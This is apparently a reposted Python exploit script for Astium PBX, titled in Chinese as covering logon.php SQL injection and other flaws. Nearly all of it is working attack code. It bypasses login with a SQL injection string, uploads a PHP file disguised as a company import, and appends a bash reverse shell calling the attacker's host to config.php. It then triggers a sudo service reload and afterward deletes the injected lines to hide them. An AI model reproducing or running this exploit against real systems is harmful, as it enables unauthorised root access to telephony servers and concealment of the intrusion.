Astium PBX 'logon.php'SQL注入等多个安全漏洞(2)


 # PHP script to write our reverse shell to the /usr/local/astium/web/php/config.php script.
 phpScript='''<?php
 $f = fopen("/usr/local/astium/web/php/config.php", "a");
 fwrite($f, "\\n<?php system('/bin/bash -i >& /dev/tcp/%s/%s 0>&1'); ?>");
 fclose($f);
 system("sudo /sbin/service astcfgd reload");
 // Sleep 1 minute, so that we have enough time for the reload to trigger our reverse shell
 sleep(60);
 $lines = file('/usr/local/astium/web/php/config.php');
 // Delete last 2 lines (containing our reverse shell) of the config.php file, else the web interface won't work anymore after our exploit.
 array_pop($lines);
 array_pop($lines);
 $file = join('', $lines);
 $file_handle = fopen('/usr/local/astium/web/php/config.php', 'w');
 fputs($file_handle, $file);
 fclose($file_handle);
 ?>''' % (lhost, lport)

# Create a random file with 8 characters
 filename = ''
 for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',8):
    filename+=i
 filename +=".php"

# Create the form with simple fields
 form = MultiPartForm()
 form.add_field('__act', 'submit')
   
# Add a "fake" file, our simple PHP script.
 form.add_file('importcompany', filename, fileHandle=StringIO(phpScript))

# SQL Injection to bypass login
 SQLiAuthBypass = "system' OR 1='1"

# Our Cookie Jar
 cj = cookielib.CookieJar()
 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

print "[*] Opening index.php to get Cookies"
 # Just open the url to grab the cookies and put them in the jar
 resp = opener.open("http://%s/en/content/index.php" %rhost)

print "[*] Sending evil SQLi authentication bypass payload"
 # Set our post parameters and bypass the logon.php with our SQL Injection
 post_params = urllib.urlencode({'__act' : 'submit', 'user_name' : SQLiAuthBypass, 'pass_word' : 'pwned', 'submit' : 'Login'})
 resp = opener.open("http://%s/en/logon.php" %rhost, post_params)

print "[*] Uploading PHP script " + filename + " to inject PHP code in '/usr/local/astium/web/php/config.php' and run a 'sudo /sbin/service astcfgd reload' to create a reverse shell"
 # Create our multi-part body + headers file upload request
 resp = urllib2.Request("http://%s/en/database/import.php" % rhost)
 body = str(form)
 resp.add_header('Content-type', form.get_content_type())
 resp.add_header('Content-length', len(body))
 resp.add_data(body)
 request = opener.open(resp).read()
